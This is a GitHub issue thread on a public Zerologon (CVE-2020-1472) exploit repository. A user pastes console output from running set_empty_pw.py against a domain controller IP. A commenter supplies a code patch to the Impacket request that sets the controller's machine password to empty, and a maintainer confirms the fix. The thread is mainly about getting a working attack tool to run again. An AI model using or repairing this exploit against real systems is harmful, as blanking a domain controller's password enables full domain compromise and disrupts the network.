risksense / zerologon

Exploit for zerologon cve-2020-1472
MIT License
635 stars 146 forks source link

'bytes' object does not support item assignment #2

Closed kevthehermit closed 4 years ago

kevthehermit commented 4 years ago

set_empty_pw hits an error and is not successful see error below.

Other POCs worked OK

root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\x0c\x818\x9e\x86\xe34\xc7' 
NegotiateFlags:                  556793855 
AccountRid:                      1008 
ErrorCode:                       0 

server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment

Success! DC should now have the empty string as its machine password.
gioporta commented 4 years ago

Looks like this is the result of a change in Impacket - see SecureAuthCorp/Impacket@b867b21

I was able to fix it by replacing the following code at lines 93-95 in set_empty_pw.py:

request["ClearNewPassword"] = nrpc.NL_TRUST_PASSWORD()
request["ClearNewPassword"]["Buffer"] = b'\x00'*512
request["ClearNewPassword"]["Length"] = 0 # It winds up being 516 bytes mentioned in the Secur whitepaper because this is 4 bytes

with this:

cnp = nrpc.NL_TRUST_PASSWORD()
cnp['Buffer'] = b'\x00'*512
cnp['Length'] = 0
request["ClearNewPassword"] = cnp.getData()
jmage-rs commented 4 years ago

Updated to support new Impacket changes in https://github.com/risksense/zerologon/commit/05ba66e088797fd2f8e2efcd4dfbd80d64e801f6 . Thanks for reporting and thanks for investigating.